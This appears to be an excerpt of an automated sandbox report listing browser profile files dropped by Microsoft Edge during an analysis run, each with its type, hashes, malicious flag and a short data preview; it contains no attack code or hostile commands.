                                                                                                                                                                                                                                                                                Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............

                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\CURRENT (copy)

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):16
                                                                                                                                                                                                                                                                                Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\LOG

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):285
                                                                                                                                                                                                                                                                                Entropy (8bit):5.154844851823937
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:6:iOvWMNXAB1wkn23oH+Tcwt86FB2KLlNWM/3+q2Pwkn23oH+Tcwt865IFUv:7hNQkfYeb/FFL9/OvYfYeb/WFUv
                                                                                                                                                                                                                                                                                MD5:21FE69B798057283AAF3D0F71CB6946E
                                                                                                                                                                                                                                                                                SHA1:5B92994B47B7083EA5E83BB2A02DD50E5E1DCAB3
                                                                                                                                                                                                                                                                                SHA-256:F81C00C69815D8A440D8773B78D48AB69D006632B5B7E84C13AEA118B76388B7
                                                                                                                                                                                                                                                                                SHA-512:F4B0ACC9ADCEB47640D4125469FB50E25C63974F385D4975F2381C7C9FEBE8A4255D14DB61A9AE010CCBF66C155BBFA6C59B5201360A9B01DBDE5DDF01D3D153
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Preview:2025/03/08-18:52:29.108 2268 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts since it was missing..2025/03/08-18:52:29.161 2268 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/MANIFEST-000001.

                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\MANIFEST-000001

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):41
                                                                                                                                                                                                                                                                                Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                                MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                                                SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                                                SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                                                SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\000003.log

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):1197
                                                                                                                                                                                                                                                                                Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:12:qWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW:
                                                                                                                                                                                                                                                                                MD5:A2A3B1383E3AAC2430F44FC7BF3E447E
                                                                                                                                                                                                                                                                                SHA1:B807210A1205126A107A5FE25F070D2879407AA4
                                                                                                                                                                                                                                                                                SHA-256:90685D4E050DA5B6E6F7A42A1EE21264A68F1734FD3BD4A0E044BB53791020A2
                                                                                                                                                                                                                                                                                SHA-512:396FAB9625A2FF396222DBC86A0E2CDE724C83F3130EE099F2872AED2F2F2ECE13B0853D635F589B70BD1B5E586C05A3231D68CAF9E46B6E2DAC105A10D0A1C8
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5........

                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\LOG

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):322
                                                                                                                                                                                                                                                                                Entropy (8bit):5.1656430957796
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:6:iOvWMZyq2Pwkn23oH+Tcwt8NIFUtdWMP1ZmwrWMZRkwOwkn23oH+Tcwt8+eLJ:7hcvYfYebpFUt7P1/9/5JfYebqJ
                                                                                                                                                                                                                                                                                MD5:77E1AF64B3614FF33701C57E73AAB186
                                                                                                                                                                                                                                                                                SHA1:88D0DB8C8A30D365AF7AEE21F374973C6EDC0F76
                                                                                                                                                                                                                                                                                SHA-256:349DF9B28F693CCB83DF087DFE452A774DC0A3F8916AE47B0C4158F2CF6D9496
                                                                                                                                                                                                                                                                                SHA-512:B42D7470B09C9BE603B7CBE75C539E0F08AA56A1F8FF07DBC7C3494CAC2CC77BB80C64508DE0BB6B67B97B9B10CE21E3CBD247B4FEBED331FB8A0AA38EBEAB84
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Preview:2025/03/08-18:52:29.706 2270 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/MANIFEST-000001.2025/03/08-18:52:29.706 2270 Recovering log #3.2025/03/08-18:52:29.706 2270 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/000003.log .

                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\LOG.old (copy)

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):322
                                                                                                                                                                                                                                                                                Entropy (8bit):5.1656430957796
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:6:iOvWMZyq2Pwkn23oH+Tcwt8NIFUtdWMP1ZmwrWMZRkwOwkn23oH+Tcwt8+eLJ:7hcvYfYebpFUt7P1/9/5JfYebqJ
                                                                                                                                                                                                                                                                                MD5:77E1AF64B3614FF33701C57E73AAB186
                                                                                                                                                                                                                                                                                SHA1:88D0DB8C8A30D365AF7AEE21F374973C6EDC0F76
                                                                                                                                                                                                                                                                                SHA-256:349DF9B28F693CCB83DF087DFE452A774DC0A3F8916AE47B0C4158F2CF6D9496
                                                                                                                                                                                                                                                                                SHA-512:B42D7470B09C9BE603B7CBE75C539E0F08AA56A1F8FF07DBC7C3494CAC2CC77BB80C64508DE0BB6B67B97B9B10CE21E3CBD247B4FEBED331FB8A0AA38EBEAB84
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Preview:2025/03/08-18:52:29.706 2270 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/MANIFEST-000001.2025/03/08-18:52:29.706 2270 Recovering log #3.2025/03/08-18:52:29.706 2270 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/000003.log .

                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\ExtensionActivityComp

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 1, cookie 0x1, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):4096
                                                                                                                                                                                                                                                                                Entropy (8bit):0.3169096321222068
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:3:lSWbNFl/sl+ltl4ltllOl83/XWEEabIDWzdWuAzTgdWj3FtFIU:l9bNFlEs1ok8fDEPDadUTgd81Z
                                                                                                                                                                                                                                                                                MD5:2554AD7847B0D04963FDAE908DB81074
                                                                                                                                                                                                                                                                                SHA1:F84ABD8D05D7B0DFB693485614ECF5204989B74A
                                                                                                                                                                                                                                                                                SHA-256:F6EF01E679B9096A7D8A0BD8151422543B51E65142119A9F3271F25F966E6C42
                                                                                                                                                                                                                                                                                SHA-512:13009172518387D77A67BBF86719527077BE9534D90CB06E7F34E1CCE7C40B49A185D892EE859A8BAFB69D5EBB6D667831A0FAFBA28AC1F44570C8B68F8C90A4
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\ExtensionActivityEdge

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 2, database pages 8, cookie 0x8, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):32768
                                                                                                                                                                                                                                                                                Entropy (8bit):0.40981274649195937
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:24:TL1WK3iOvwxwwweePKmJIOAdQBVA/kjo/TJZwJ9OV3WOT/5eQQ:Tmm+/9ZW943WOT/
                                                                                                                                                                                                                                                                                MD5:1A7F642FD4F71A656BE75B26B2D9ED79
                                                                                                                                                                                                                                                                                SHA1:51BBF587FB0CCC2D726DDB95C96757CC2854CFAD
                                                                                                                                                                                                                                                                                SHA-256:B96B6DDC10C29496069E16089DB0AB6911D7C13B82791868D583897C6D317977
                                                                                                                                                                                                                                                                                SHA-512:FD14EADCF5F7AB271BE6D8EF682977D1A0B5199A142E4AB353614F2F96AE9B49A6F35A19CC237489F297141994A4A16B580F88FAC44486FCB22C05B2F1C3F7D1
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j............M.....8...b..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\jmjflgjpcpepeafmmgdpfkogkghcpiha\1.2.1_0\_metadata\computed_hashes.json

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):429
                                                                                                                                                                                                                                                                                Entropy (8bit):5.809210454117189
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:6:Y8U0vEjrAWT0VAUD9lpMXO4SrqiweVHUSENjrAWT0HQQ9/LZyVMQ3xqiweVHlrSQ:Y8U5j0pqCjJA7tNj0pHx/LZ4hcdQ
                                                                                                                                                                                                                                                                                MD5:5D1D9020CCEFD76CA661902E0C229087
                                                                                                                                                                                                                                                                                SHA1:DCF2AA4A1C626EC7FFD9ABD284D29B269D78FCB6
                                                                                                                                                                                                                                                                                SHA-256:B829B0DF7E3F2391BFBA70090EB4CE2BA6A978CCD665EEBF1073849BDD4B8FB9
                                                                                                                                                                                                                                                                                SHA-512:5F6E72720E64A7AC19F191F0179992745D5136D41DCDC13C5C3C2E35A71EB227570BD47C7B376658EF670B75929ABEEBD8EF470D1E24B595A11D320EC1479E3C
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Preview:{"file_hashes":[{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","6RbL+qKART8FehO4s7U0u67iEI8/jaN+8Kg3kII+uy4=","CuN6+RcZAysZCfrzCZ8KdWDkQqyaIstSrcmsZ/c2MVs="],"block_size":4096,"path":"content.js"},{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","UL53sQ5hOhAmII/Yx6muXikzahxM+k5gEmVOh7xJ3Rw=","u6MdmVNzBUfDzMwv2LEJ6pXR8k0nnvpYRwOL8aApwP8="],"block_size":4096,"path":"content_new.js"}],"version":2}

                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 39, 1st free page 10, free pages 4, cookie 0x45, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):159744
                                                                                                                                                                                                                                                                                Entropy (8bit):0.5241404324800358
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:96:56U+bGzPDLjGQLBE3up+U0jBo4tgi3JMe9xJDECVjN:5R+GPXBBE3upb0HtTTDxVj
                                                                                                                                                                                                                                                                                MD5:241322143A01979D346689D9448AC8C0
                                                                                                                                                                                                                                                                                SHA1:DD95F97EE1CCB8FD9026D2156DE9CB8137B816D1
                                                                                                                                                                                                                                                                                SHA-256:65EEBDEC4F48A111AC596212A1D71C3A5CFA996797500E5344EEABDFA02527C8
                                                                                                                                                                                                                                                                                SHA-512:9C7241462A9DADEF25D8EEB1C14BABFBA65C451EBAFBC068B9856E4EF0EB6F894A44686CBB0D1F46C7F546335D0C53A3E386E6C1A017082DE127F8F9C0A54BD2
                                                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                                                Preview:SQLite format 3......@ .......'...........E......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):8720
                                                                                                                                                                                                                                                                                Entropy (8bit):0.3283577581710296
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:6:ko0A/J3+t76Y4QZZofU99pO0BY+tcqR4EZY4QZvGAc:koFhHQws9Ld1bBQZG5
                                                                                                                                                                                                                                                                                MD5:C97AF2F33D2A954C995EE8E42018DB95
                                                                                                                                                                                                                                                                                SHA1:5935026DBF01A5074DDB0CD9BCB15A88A9B38C43
                                                                                                                                                                                                                                                                                SHA-256:B366BE6B866636660E9052E24791A6A765A733AC1F3794072AF6037A40AC803A
                                                                                                                                                                                                                                                                                SHA-512:3A4601017DCE206D711407CA11246D7B6A01542FEB1C8F6A7BABA3FD1F700DDEA8CD963B931FEB5C026514C7D8D43409F30B5B025596A7B44280D96CD69F9DB6
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Preview:..............~9...'....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HubApps (copy)

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1597), with CRLF line terminators
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):115717
                                                                                                                                                                                                                                                                                Entropy (8bit):5.183660917461099
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:1536:utDURN77GZqW3v6PD/469IxVBmB22q7LRks3swn0:utAaE2Jt0
                                                                                                                                                                                                                                                                                MD5:3D8183370B5E2A9D11D43EBEF474B305
                                                                                                                                                                                                                                                                                SHA1:155AB0A46E019E834FA556F3D818399BFF02162B
                                                                                                                                                                                                                                                                                SHA-256:6A30BADAD93601FC8987B8239D8907BCBE65E8F1993E4D045D91A77338A2A5B4
                                                                                                                                                                                                                                                                                SHA-512:B7AD04F10CD5DE147BDBBE2D642B18E9ECB2D39851BE1286FDC65FF83985EA30278C95263C98999B6D94683AE1DB86436877C30A40992ACA1743097A2526FE81
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Preview:{.. "current_locale": "en-GB",.. "hub_apps": [ {.. "auto_show": {.. "enabled": true,.. "fre_notification": {.. "enabled": true,.. "header": "Was opening this pane helpful to you?",.. "show_count": 2,.. "text": "Was opening this pane helpful to you?".. },.. "settings_description": "We'll automatically open Bing Chat in the sidebar to show you relevant web experiences alongside your web content",.. "settings_title": "Automatically open Bing Chat in the sidebar",.. "triggering_configs|flight:msHubAppsMsnArticleAutoShowTriggering": [ {.. "show_count_basis": "signal",.. "signal_name": "IsMsnArticleAutoOpenFromP1P2",.. "signal_threshold": 0.5.. } ],.. "triggering_configs|flight:msUndersidePersistentChat": [ {.. "signal_name": "IsUndersidePersistentChatLink",.. "signal_threshold": 0.5.. } ],.. "triggering_co

                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HubApps Icons

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 5, database pages 11, cookie 0x3, schema 4, UTF-8, version-valid-for 5
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):45056
                                                                                                                                                                                                                                                                                Entropy (8bit):3.548949447261209
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:384:zj9P0uucSQkQerkP/KbtZ773pLyhkCgam6IWRKToaAu:zdBBSe2kP/w7s+FmRKcC
                                                                                                                                                                                                                                                                                MD5:529B85D4F9DC56F6D315EC55F1FDDC8B
                                                                                                                                                                                                                                                                                SHA1:150BBF265B7DCF5568B576D89E54F11E843553BF
                                                                                                                                                                                                                                                                                SHA-256:E44830ADBB178DD3F0963DFA13B5CE6A1E2DB1822048E412CD965D7230DE5E1A
                                                                                                                                                                                                                                                                                SHA-512:55A766CEA6C02D2E594FE01758ADC562FA263AE50BF6BDC6D98D201CC67848D6F20BE537098C91B7286BBAAFD3CF00D054CF635127320FA3A1CFEF60902E4DA6
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...:.8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold\LOG

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):406
                                                                                                                                                                                                                                                                                Entropy (8bit):5.265553739040202
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:12:7mvYfYeb8rcHEZrELFUt9/y5JfYeb8rcHEZrEZSJ:7kYfYeb8nZrExgGJfYeb8nZrEZe
                                                                                                                                                                                                                                                                                MD5:2674D9EC3734C74A5C548DB0107E21E6
                                                                                                                                                                                                                                                                                SHA1:D3114BC0D26566FE5355137A7220E66CCDCB6F89
                                                                                                                                                                                                                                                                                SHA-256:F8835FDEE4BBFE03165927C65F19DD69CA7BB369A5832A88C4DD940BA40C200C
                                                                                                                                                                                                                                                                                SHA-512:C85249F385CA539DBCFE15FEDA23608934B7848B5E2974969E9778638ADED1C1E5A633C68F7AF56BFC4AA689045DEDF23C7F996E2684A950EB880010AD23904E
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Preview:2025/03/08-18:52:30.727 2268 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/MANIFEST-000001.2025/03/08-18:52:30.727 2268 Recovering log #3.2025/03/08-18:52:30.728 2268 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/000003.log .

                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold\LOG.old (copy)

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):406
                                                                                                                                                                                                                                                                                Entropy (8bit):5.265553739040202
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:12:7mvYfYeb8rcHEZrELFUt9/y5JfYeb8rcHEZrEZSJ:7kYfYeb8nZrExgGJfYeb8nZrEZe
                                                                                                                                                                                                                                                                                MD5:2674D9EC3734C74A5C548DB0107E21E6
                                                                                                                                                                                                                                                                                SHA1:D3114BC0D26566FE5355137A7220E66CCDCB6F89
                                                                                                                                                                                                                                                                                SHA-256:F8835FDEE4BBFE03165927C65F19DD69CA7BB369A5832A88C4DD940BA40C200C
                                                                                                                                                                                                                                                                                SHA-512:C85249F385CA539DBCFE15FEDA23608934B7848B5E2974969E9778638ADED1C1E5A633C68F7AF56BFC4AA689045DEDF23C7F996E2684A950EB880010AD23904E
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Preview:2025/03/08-18:52:30.727 2268 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/MANIFEST-000001.2025/03/08-18:52:30.727 2268 Recovering log #3.2025/03/08-18:52:30.728 2268 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/000003.log .

                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\000003.log

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):1986
                                                                                                                                                                                                                                                                                Entropy (8bit):5.640532728074238
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:48:UZJw988Mkvvw5XREV0374ZyGR4W7g5RHHS2/48ylsT:UXCvwNRtP3TQ8osT
                                                                                                                                                                                                                                                                                MD5:A7A0E9C72E3A5527D594A9160F77B242
                                                                                                                                                                                                                                                                                SHA1:35AD2A704B3D23E8A4DDCD346614DC2E710D9297
                                                                                                                                                                                                                                                                                SHA-256:E913D997164FFC7AC4B48E98D119A685FB9298F19BD8EF152CDE5276E144C7AC
                                                                                                                                                                                                                                                                                SHA-512:5A3176933E69F6A299DDFB9482785E5396E99334043E44DED87B936606C4B9AEFD8552862ECB0C8C9D734ECA15AA0B3ED371F6706499EB937CED58483A49094B
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Preview:i.+.................VERSION.1..META:https://ntp.msn.com.............!_https://ntp.msn.com..LastKnownPV..1741477967029.._https://ntp.msn.com..MUID!.30F2568B099669BF2FA4432208F968D1.%_https://ntp.msn.com..authRecordTrail...[{"time":"2025-03-08T23:52:46.944Z","action":"NUT","result":"SUCCESS","state":{"isSignedIn":false,"accountType":"UNSUPPORTED_SOVEREIGNTY","signedInAccounts":[0],"storage":{"elt":0,"lt":0,"aace":0,"ace":0,"app_anon":0,"anon":0,"app_wid":0},"appType":"edgeChromium","pageType":"dhp"}}].._https://ntp.msn.com..bkgdV...{"cachedVideoId":-1,"lastUpdatedTime":1741477967122,"schedule":[37,24,-1,-1,-1,-1,16],"scheduleFixed":[37,24,-1,-1,-1,-1,16],"simpleSchedule":[51,13,12,26,30,46,16]}.%_https://ntp.msn.com..clean_meta_flag..1.5_https://ntp.msn.com..enableUndersideAutoOpenFromEdge..false.&_https://ntp.msn.com..oneSvcUniTunMode..header."_https://ntp.msn.com..pageVersions..{"dhp":"20250307.574"}.*_https://ntp.msn.com..pivotSelectionSource..sticky.#_https://ntp.msn.com..selectedP

                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\LOG

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):334
                                                                                                                                                                                                                                                                                Entropy (8bit):5.178413267459042
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:6:iOvWM1N+q2Pwkn23oH+Tcwt8a2jMGIFUtdWMYFH5ZmwrWMcFX9VkwOwkn23oH+Tg:7h1IvYfYeb8EFUt7YZ5/9cZ5JfYeb8bJ
                                                                                                                                                                                                                                                                                MD5:D1127208CE3DB6202A5339243DD51014
                                                                                                                                                                                                                                                                                SHA1:1B2228E0F28F5304CAC5D9F2D5134C5C03BD926C
                                                                                                                                                                                                                                                                                SHA-256:437398A0D818E1AEC2D048FB07E87087E8DACD8961307E2EDC786E0100448350
                                                                                                                                                                                                                                                                                SHA-512:9E2EE3A6CCFEFC5BD8043372BC41E13B6D0B65618A14C418A7EE26395BEC2E81A283229744316021CF71931B53104021D0F23092A52834DDC636A24DEA07D2B8
                                                                                                                                                                                                                                                                                Malicious:false
